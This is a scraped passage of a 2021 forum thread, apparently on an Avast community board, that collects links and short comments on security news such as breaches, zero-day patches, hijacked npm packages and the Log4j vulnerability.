https://blog.avast.com/2015/09/24/got-an-aging-parent-tell-them-about-the-grandparent-scam/
-
Weekly Security News Roundup w/e 9-3-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/03/13/01/crQeIVVQUWn/preview.jpg)
https://youtu.be/FEQ8yPfTCrI (https://youtu.be/FEQ8yPfTCrI)
-
9-3-2021 Breaking Security News Flash -
Beware: Hurricane Ida Scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/03/21/35/crQeraVQwaX/preview.jpg)
https://youtu.be/tVgxJ4yiHc0 (https://youtu.be/tVgxJ4yiHc0)
-
Over 1 Million Sites Affected by Gutenberg Template Library & Redux Framework Vulnerabilities
https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/
-
Instagram Bans are now being sold as Crime-as-a-Service
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/07/18/03/crQiFeVQkH0/preview.jpg)
https://youtu.be/pWBjUIOzK5E (https://youtu.be/pWBjUIOzK5E)
If you have an Instagram account, pay attention.
Thanks to David Strom for his article and the idea for this video.
https://blog.avast.com/author/david-strom
-
Hackers leak passwords for 500,000 Fortinet VPN accounts
https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/
-
Hackers leak passwords for 500,000 Fortinet VPN accounts
https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/
How the hell are companies NOT learning from the past on the storage of sensitive data being encrypted, and protected, etc. etc. until they get hacked :(
-
ProtonMail not so private after all
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/09/12/28/crQQluVQHIr/preview.jpg)
https://youtu.be/DcYzsxN6VV4 (https://youtu.be/DcYzsxN6VV4)
Even ProtonMail isn't totally private.
-
Avoid Social Media Quizzes
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/09/15/06/crQQo1VQHmQ/preview.jpg)
https://youtu.be/4nGjP78QmYc (https://youtu.be/4nGjP78QmYc)
These quizzes are designed for you to share personal information
usually with scammers.
-
Weekly Security News Roundup w/e 9-10-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/10/10/43/crQ665VQKAi/preview.jpg)
https://youtu.be/q0U8Uns-8yc (https://youtu.be/q0U8Uns-8yc)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
9-14-2021 Breaking Security News Flash - Apple Zero Day Vulnerability
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/14/12/59/crQ2lRV6c1K/preview.jpg)
https://youtu.be/fw-L3d4_U-k (https://youtu.be/fw-L3d4_U-k)
A dangerous Apple zero day vulnerability that need to be patched ASAP.
-
New Windows security updates break network printing
https://www.bleepingcomputer.com/news/security/new-windows-security-updates-break-network-printing/
-
Weekly Security News Roundup w/e 9-17-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/17/13/56/crQbI8V6XG8/preview.jpg)
https://youtu.be/ugaCtJBpMI0 (https://youtu.be/ugaCtJBpMI0)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
The dangers of Government use of biometric data.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/19/14/28/crQq2uV6oWI/preview.jpg)
https://youtu.be/XPf0wsVlsfs (https://youtu.be/XPf0wsVlsfs)
Opt-out of data collection of any type whenever and where ever possible.
Read the full article by Joe Bosso here,
https://blog.avast.com/government-use-of-biometric-data-avast
-
I have just phoned for technical support to be told there is NONE for at LEASE a MONTH !!!!!!!!!!!!!!!!!!!!!!!!
-
I have just phoned for technical support to be told there is NONE for at LEASE a MONTH !!!!!!!!!!!!!!!!!!!!!!!!
If you're looking for help, please start your own topic.
-
A list of vulnerabilities being abused by ransomware groups:
a. FBI's top 30: https://us-cert.cisa.gov/ncas/alerts/aa21-209a
b. NSA's top 25: https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/
It mostly concerns Microsoft oriented enterprise products, next to QNAP, which is a consumer product,
while HyperV was not mentioned as it was found to be vulnerable recently (a fortnight ago).
polonus
-
Netgear fixes dangerous code execution bug in multiple routers
https://www.bleepingcomputer.com/news/security/netgear-fixes-dangerous-code-execution-bug-in-multiple-routers/
-
Weekly Security News Roundup w/e 9-24-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/24/20/27/crQZYtV6znw/preview.jpg)
https://youtu.be/P9omro7_HJE (https://youtu.be/P9omro7_HJE)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Hackers exploiting critical VMware vCenter CVE-2021-22005 bug
https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-vmware-vcenter-cve-2021-22005-bug/
-
Facebook Pauses Instagram For Kids
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/28/18/27/crQuFtV6mdY/preview.jpg)
https://youtu.be/5GB6MksWvLo (https://youtu.be/5GB6MksWvLo)
Thanks to Grace Macej for her excellent article.
https://blog.avast.com/author/grace-macej
-
FinFisher spyware uses (abuses) UEFI-Bootkit to infest computers.
Read: https://securelist.com/finspy-unseen-findings/104322/
and https://www.kaspersky.com/about/press-releases/2021_finfisher-spyware-improves-its-arsenal-with-four-levels-of-obfuscation-uefi-infection-and-more
This government spyware can repair the original MBR and Windows Boot Manager to leave no traces behind.
Finspy spyware has been used since 2011 by governments and government secret services.
polonus
-
The Epik data breach is political in nature — here's why you should care
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/29/14/28/crQU2uV6dLp/preview.jpg)
https://youtu.be/j7zRAMcQPac (https://youtu.be/j7zRAMcQPac)
When our freedom of speech is attacked, we should all care.
Thanks to Joe Bosso for his eye-opening article.
https://blog.avast.com/author/joe-bosso
-
Weekly Security News Roundup w/e 10-1-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/10/01/12/51/cr6Vl7V6Pb9/preview.jpg)
https://youtu.be/bPuOML2xAho (https://youtu.be/bPuOML2xAho)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
The Telegraph exposes 10 TB database with subscriber info
https://www.bleepingcomputer.com/news/security/the-telegraph-exposes-10-tb-database-with-subscriber-info/
-
Just today, I was going to check my bank account via "Bank Mode" on Avast! Secure Browser, but for some reason, it said there was "my connection was not private" when I went to the website (Tompkins Trust Company, to be exact). For precaution, I did a Network Scan with Avast! [Free Antivirus], but it says there were "no vulnerabilities found.
And just a few seconds ago, I checked it out once more (again through Bank Mode), but I was able to get to it no problem.
I honestly have no idea what this means, or if it's anything I should be worried about.
-
Hi CTWarmbrodt,
Sub-domain was hard to check: Test #1441921 - secure.tompkinstrust.com
2021-10-06 16:02 GMT+02:00
IPv4 IPv6
All 4
Info 2
Notice 0
Warning 0
Error 0
Critical 0
Filter text
# Module Level Message
SYSTEM
0 SYSTEM INFO Using version v4.2.3 of the Zonemaster engine.
1 SYSTEM CRITICAL Not enough data about secure.tompkinstrust.com was found to be able to run tests.
BASIC
But SOA 'mname' nameserver (ns-1318.awsdns-36.org) is authoritative for 'tompkinstrust.com' zone.
polonus
-
Actively exploited Apache 0-day also allows remote code execution
https://www.bleepingcomputer.com/news/security/actively-exploited-apache-0-day-also-allows-remote-code-execution/
-
Massive Twitch hack: Source code and payment reports leaked
https://www.bleepingcomputer.com/news/security/massive-twitch-hack-source-code-and-payment-reports-leaked/
-
10/8/2021 Avast Security News Roundup
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/10/08/19/40/cr6jqkVXqzP/preview.jpg)
https://youtu.be/tPednH9D2Jw (https://youtu.be/tPednH9D2Jw)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Stealing millions in Crypto Currency by using Copy and Paste
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/10/12/15/41/cr6lopVXUpJ/preview.jpg)
https://youtu.be/MOnr3FIuvx8 (https://youtu.be/MOnr3FIuvx8)
Not being careful with copy and paste in this instance, can be very costly.
Read the full article by Christopher Budd at:
https://blog.avast.com/author/christopher-budd
-
Phishing campaign uses math symbols to evade detection
https://www.bleepingcomputer.com/review/security/phishing-campaign-uses-math-symbols-to-evade-detection/
-
Verizon digital carrier Visible customer accounts were hacked
https://www.bleepingcomputer.com/news/security/verizon-digital-carrier-visible-customer-accounts-were-hacked/
-
Malicious Chrome ad blocker injects ads behind the scenes
https://www.bleepingcomputer.com/news/security/malicious-chrome-ad-blocker-injects-ads-behind-the-scenes/
-
Weekly Security News Roundup w/e 10-15-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/10/15/14/29/cr6o2UVXkZ9/preview.jpg)
https://youtu.be/aB-4cQlf_n8 (https://youtu.be/aB-4cQlf_n8)
-
Microsoft asks admins to patch PowerShell to fix WDAC bypass
https://www.bleepingcomputer.com/news/microsoft/microsoft-asks-admins-to-patch-powershell-to-fix-wdac-bypass/
-
FBI warns of fake govt sites used to steal financial, personal data
https://www.bleepingcomputer.com/news/security/fbi-warns-of-fake-govt-sites-used-to-steal-financial-personal-data/
-
Massive campaign uses YouTube to push password-stealing malware
https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/
-
Weekly Security News Roundup w/e 10-22-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/10/22/11/52/cr63XsVlcuh/preview.jpg)
https://youtu.be/hDKMhSRlTk4 (https://youtu.be/hDKMhSRlTk4)
-
Malware Discovered in Popular NPM Package, ua-parser-js
https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js
-
Report finds many ISPs use web browsing data and group consumers using sensitive characteristics such as race and sexual orientation
https://www.ftc.gov/news-events/press-releases/2021/10/ftc-staff-report-finds-many-internet-service-providers-collect
One thing one could do is make use of a VPN (avast VPN)
another way when MAC-addresses being collected is to make use of
https://www.myshadow.org/resources/technitium-mac-address-changer?locale=en (free)
And remember you do not have to worry about the info you do not share with Interwebz.
polonus
-
Malware Discovered in Popular NPM Package, ua-parser-js
https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js
More here: https://www.bleepingcomputer.com/news/security/popular-npm-library-hijacked-to-install-password-stealers-miners/
-
Gamers beware: Malware and malicious cracked games pose risks
https://blog.avast.com/malicious-cracked-games-pose-risks-avast
-
Mozilla blocks malicious add-ons installed by 455K Firefox users
https://www.bleepingcomputer.com/news/security/mozilla-blocks-malicious-add-ons-installed-by-455k-firefox-users/
https://blog.mozilla.org/security/2021/10/25/securing-the-proxy-api-for-firefox-add-ons/
-
Critical site deletion vulnerability in WordPress CMS plug-in:
https://www.wordfence.com/blog/2021/10/site-deletion-vulnerability-in-hashthemes-plugin/
(e.g. HashThemes Demo Importer not updated to the latest version).
pol
-
All Windows versions impacted by new LPE zero-day vulnerability
https://www.bleepingcomputer.com/news/security/all-windows-versions-impacted-by-new-lpe-zero-day-vulnerability/
-
Weekly Security News Roundup w/e 10-29-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/10/29/15/03/cr6UoeVl045/preview.jpg)
https://youtu.be/OVTUJSYLTlk (https://youtu.be/OVTUJSYLTlk)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Microsoft: Windows KB5006674, KB5006670 updates break printing
https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-kb5006674-kb5006670-updates-break-printing/
-
Microsoft: Windows KB5006674, KB5006670 updates break printing
https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-kb5006674-kb5006670-updates-break-printing/
Bl00dy brilliant, MS breaks printing with a KB (or two in this case) yet again, from the past issues and KBs breaking printing. You would have thought/hoped they had learnt from these. Fortunately for me I don't do network printing, but direct connection.
-
Microsoft: Windows KB5006674, KB5006670 updates break printing
https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-kb5006674-kb5006670-updates-break-printing/ (https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-kb5006674-kb5006670-updates-break-printing/)
Bl00dy brilliant, MS breaks printing with a KB (or two in this case) yet again, from the past issues and KBs breaking printing. You would have thought/hoped they had learnt from these. Fortunately for me I don't do network printing, but direct connection.
The break must only be affecting certain printers or systems. No problem here with printing
via my Epson ET 2720.
-
Popular 'coa' NPM library hijacked to steal user passwords
https://www.bleepingcomputer.com/news/security/popular-coa-npm-library-hijacked-to-steal-user-passwords/
-
Weekly Security News Roundup w/e 11-5-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/05/19/47/crXhqHVlGtA/preview.jpg)
https://youtu.be/n_unu7rpJ-4 (https://youtu.be/n_unu7rpJ-4)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
What does Facebook's facial recognition shutdown mean for its users?
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/08/14/26/crXj2OVl70a/preview.jpg)
https://youtu.be/RpoqWIQqlk4 (https://youtu.be/RpoqWIQqlk4)
Is there really any benefit to the average user in Facebook's move to shut down this service?
How do you protect yourself from this technology?
Thanks to Joe Bosso's excellent article on this topic. https://blog.avast.com/author/joe-bosso
-
FBI warns of Iranian hackers looking to buy US orgs’ stolen data
https://www.bleepingcomputer.com/news/security/fbi-warns-of-iranian-hackers-looking-to-buy-us-orgs-stolen-data/
-
AMD fixes dozens of Windows 10 graphics driver security bugs
https://www.bleepingcomputer.com/news/security/amd-fixes-dozens-of-windows-10-graphics-driver-security-bugs/
-
Weekly Security News Roundup w/e 11-12-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/12/21/35/crXlraVIhxD/preview.jpg)
https://youtu.be/tBvndGkeJDc (https://youtu.be/tBvndGkeJDc)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
News Flash Update - FBI System Hacked
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/14/14/54/crX22LVIjjj/preview.jpg)
https://youtu.be/tzrAA81XLok (https://youtu.be/tzrAA81XLok)
On 11/13/2021 the Federal Bureau of Investigation (FBI) email servers were hacked
to distribute spam email.
-
News Flash Update - FBI System Hacked
https://youtu.be/tzrAA81XLok (https://youtu.be/tzrAA81XLok)
On 11/13/2021 the Federal Bureau of Investigation (FBI) email servers were hacked
to distribute spam email.
Hoax Email Blast Abused Poor Coding in FBI Website
https://krebsonsecurity.com/2021/11/hoax-email-blast-abused-poor-coding-in-fbi-website/
https://www.fbi.gov/news/pressrel/press-releases/fbi-statement-on-incident-involving-fake-emails
-
News Flash Update - FBI System Hacked
https://youtu.be/tzrAA81XLok (https://youtu.be/tzrAA81XLok)
On 11/13/2021 the Federal Bureau of Investigation (FBI) email servers were hacked
to distribute spam email.
Hoax Email Blast Abused Poor Coding in FBI Website
https://krebsonsecurity.com/2021/11/hoax-email-blast-abused-poor-coding-in-fbi-website/ (https://krebsonsecurity.com/2021/11/hoax-email-blast-abused-poor-coding-in-fbi-website/)
https://www.fbi.gov/news/pressrel/press-releases/fbi-statement-on-incident-involving-fake-emails (https://www.fbi.gov/news/pressrel/press-releases/fbi-statement-on-incident-involving-fake-emails)
Hindsight is a wonderful thing. :)
-
https://www.businessinsider.com/pentagon-official-quit-saying-us-cybersecurity-no-match-china-2021-10 (https://www.businessinsider.com/pentagon-official-quit-saying-us-cybersecurity-no-match-china-2021-10)
-
https://www.businessinsider.com/pentagon-official-quit-saying-us-cybersecurity-no-match-china-2021-10 (https://www.businessinsider.com/pentagon-official-quit-saying-us-cybersecurity-no-match-china-2021-10)
All the breaches and blunders pretty much prove his point.
-
High severity BIOS flaws affect numerous Intel processors
https://www.bleepingcomputer.com/news/security/high-severity-bios-flaws-affect-numerous-intel-processors/
-
Here are the new Emotet spam campaigns hitting mailboxes worldwide
https://www.bleepingcomputer.com/news/security/here-are-the-new-emotet-spam-campaigns-hitting-mailboxes-worldwide/
-
What is a PUP (Potentially Unwanted Program)
"A PUP is a program that may be unwanted, despite the possibility that users consented to download it.
PUPs include spyware, adware, and dialers, and are often downloaded in conjunction with a program that the user wants."
Microsoft seems to have taken that meaning a bit further.
It's applying that term to any program that also, by default, installs one or more
other programs not selected by the user. Even if the user is given the opportunity
to bypass the installation of that other(s) possibly unwanted program.
Someone just asked me about something that Microsoft tagged as a "PUA:Win32/PiriformBundler"
This is a perfect example Microsoft's new inclusion of programs to be classified as PUPs
Here is how Microsoft describes this version of a PUP:
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=PUA%3AWin32%2FPiriformBundler (https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=PUA%3AWin32%2FPiriformBundler)
-
US, UK warn of Iranian hackers exploiting Microsoft Exchange, Fortinet
https://www.bleepingcomputer.com/news/security/us-uk-warn-of-iranian-hackers-exploiting-microsoft-exchange-fortinet/
https://us-cert.cisa.gov/ncas/alerts/aa21-321a
-
Costco Discloses Data Breach After Finding Card Skimmer At One Of Its Stores
https://www.forbes.com/sites/leemathews/2021/11/12/costco-discloses-data-breach-after-finding-card-skimmer-at-one-of-its-stores/?sh=4c70de3b49fc
https://securityaffairs.co/wordpress/124534/data-breach/costco-data-breach.html
-
Google Chrome 96 breaks Twitter, Discord, video rendering and more
https://www.bleepingcomputer.com/news/google/google-chrome-96-breaks-twitter-discord-video-rendering-and-more/
-
Weekly Security News Roundup w/e 11/19/2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/19/17/34/crXqb4VIOCA/preview.jpg)
https://youtu.be/r8WY8tPtfKY (https://youtu.be/r8WY8tPtfKY)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Six million Sky routers exposed to takeover attacks for 17 months
https://www.bleepingcomputer.com/news/security/six-million-sky-routers-exposed-to-takeover-attacks-for-17-months/
https://www.pentestpartners.com/security-blog/skyfail-6-million-routers-left-exposed/
-
Even after 7 years Agent Tesla malware still kneecaps Windows security.
Re: https://www.virustotal.com/gui/url/a00a741102b59c2b3a62faeca85c5ee906876711e1af2ac0557d382f3f283d35/detection
and read: https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/
polonus
-
11/22/2021 Breaking Security NewsFlash
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/22/21/20/crX3rYVI4o8/preview.jpg)
https://youtu.be/ecknxFAlrqs (https://youtu.be/ecknxFAlrqs)
Another security breach. This time it's Go Daddy.
See the full article at How-To Geek
https://www.howtogeek.com/770477/huge-godaddy-data-breach-exposes-over-a-million-accounts/
-
New Windows zero-day with public exploit lets you become an admin
https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/
-
New Windows zero-day with public exploit lets you become an admin
https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/
Attackers exploiting zero-day vulnerability in Windows Installer — Here’s what you need to know and Talos’ coverage
https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html
-
7 Scams Targeting Holiday Shoppers
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/24/14/57/crXZ2PVIkeh/preview.jpg)
https://youtu.be/vroEAk7jCEs (https://youtu.be/vroEAk7jCEs)
Steer clear of cyber-trouble this year with these seven scams
to watch out for during the holidays.
Thanks to Grace Macej for her excellent article on this topic.
https://blog.avast.com/author/grace-macej
-
Weekly Security News Roundup w/e 11-26-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/26/21/14/crXOr2VImXG/preview.jpg)
https://youtu.be/qQ1WL-q_ALs
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They usually do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
8-year-old HP printer vulnerability affects 150 printer models
https://www.bleepingcomputer.com/news/security/8-year-old-hp-printer-vulnerability-affects-150-printer-models/
-
Emotet now spreads via fake Adobe Windows App Installer packages
https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/
-
6 Tips to Protect Holiday Tech
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/02/23/48/crln0JV2naN/preview.jpg)
https://youtu.be/lQKxVksqQ_4
Just in time for the holidays. Some security tips for those new toys.
My thanks to Christopher Budd for his excellent article on this topic.
https://blog.avast.com/how-to-protect-a-new-technology-purchase-avast
-
CoinHelper Danger and Avoidance
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/02/23/50/crln0KV2nzc/preview.jpg)
https://youtu.be/7TP4xYV15xQ
CoinHelper an unexpected payload with cracked,illegal,unauthorized
and repackaged copies of software.
Thanks to Christopher Budd for his excellent article on this topic.
https://blog.avast.com/author/christopher-budd
-
Weekly Security News Roundup w/e 12-3-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/03/17/11/crlebXV2f8I/preview.jpg)
https://youtu.be/DBRhsKrxVz8 (https://youtu.be/DBRhsKrxVz8)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
FBI: Cuba ransomware breached 49 US critical infrastructure orgs
https://www.bleepingcomputer.com/news/security/fbi-cuba-ransomware-breached-49-us-critical-infrastructure-orgs/
-
Stay away from Verizon's Custom Experience
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/04/14/36/crlf2zV21Ju/preview.jpg)
https://youtu.be/P5zprILAGyo (https://youtu.be/P5zprILAGyo)
If you're a Verizon customer and value your data, opt out of Verizon's Custom Experience.
Read the full story on this topic written by DAVE LECLAIR editor of How-To Geek (https://www.howtogeek.com/).
-
Convincing Microsoft phishing uses fake Office 365 spam alerts
https://www.bleepingcomputer.com/news/security/convincing-microsoft-phishing-uses-fake-office-365-spam-alerts/
-
Emotet now drops Cobalt Strike, fast forwards ransomware attacks
https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/
-
Emotet now drops Cobalt Strike, fast forwards ransomware attacks
Emotet now drops Cobalt Strike, fast forwards ransomware attacks
Here's the link.
https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/
-
Emotet now drops Cobalt Strike, fast forwards ransomware attacks
Emotet now drops Cobalt Strike, fast forwards ransomware attacks
Here's the link.
https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/
Oops, thanks Bob. :)
-
Has the surveillance technology industry
found another powerful ally?
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/09/13/53/crlQIMV2rNZ/preview.jpg)
https://youtu.be/6hVf21-czow (https://youtu.be/6hVf21-czow)
There is always a fine balance between spying and/or protection
when it comes to surveillance.
Thanks to Joe Bosso for his excellent article on this topic.
https://blog.avast.com/author/joe-bosso (https://blog.avast.com/author/joe-bosso)
-
Massive attack against 1.6 million WordPress sites underway
https://www.bleepingcomputer.com/news/security/massive-attack-against-16-million-wordpress-sites-underway/
-
Weekly Security News Roundup w/e 12-10-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/10/14/03/crl62eV2T3D/preview.jpg)
https://youtu.be/MhY_yLGpzIY (https://youtu.be/MhY_yLGpzIY)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/ (https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/)
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html (https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html)
https://www.lunasec.io/docs/blog/log4j-zero-day/ (https://www.lunasec.io/docs/blog/log4j-zero-day/)
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/ (https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/)
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html (https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html)
https://www.lunasec.io/docs/blog/log4j-zero-day/ (https://www.lunasec.io/docs/blog/log4j-zero-day/)
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/
http://github.com/Cybereason/Logout4Shell
-
Is the Avast Business Hub also affected from Log4j problem?
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/ (https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/)
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html (https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html)
https://www.lunasec.io/docs/blog/log4j-zero-day/ (https://www.lunasec.io/docs/blog/log4j-zero-day/)
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/
http://github.com/Cybereason/Logout4Shell
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/ (https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/)
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html (https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html)
https://www.lunasec.io/docs/blog/log4j-zero-day/ (https://www.lunasec.io/docs/blog/log4j-zero-day/)
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/ (https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/)
http://github.com/Cybereason/Logout4Shell (http://github.com/Cybereason/Logout4Shell)
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/ (https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/)
Most infections can be directly attributed to neglect.
They neglected to update the system with the latest available security patches and the system got hacked.
No different here.
-
Botnets like Mirai now come with Log4j aboard.
Re: -https://mvnrepository.com/artifact/net.mamoe/mirai-logging-log4j2
Made that link non-clickable because it has repositories (pol).
Re: https://urlhaus.abuse.ch/browse.php?search=mirai+ (already forced offline).
polonus
-
What is Log4j and Do You Need to Worry About it?
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/13/21/35/crlIraV2y0k/preview.jpg)
https://youtu.be/b2EpVYWZQLY (https://youtu.be/b2EpVYWZQLY)
A new vulnerability called Log4j has security teams scrambling worldwide.
Here's what you need to do - and what you don't need to do - about it.
Thanks to Christopher Budd for his excellent article on this topic.
https://blog.avast.com/author/christopher-budd
Details on this vulnerability are described here:
https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/ (https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/)
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html (https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html)
https://www.lunasec.io/docs/blog/log4j-zero-day/ (https://www.lunasec.io/docs/blog/log4j-zero-day/)
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/ (https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/)
http://github.com/Cybereason/Logout4Shell (http://github.com/Cybereason/Logout4Shell)
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/ (https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/)
Most infections can be directly attributed to neglect.
They neglected to update the system with the latest available security patches and the system got hacked.
No different here.
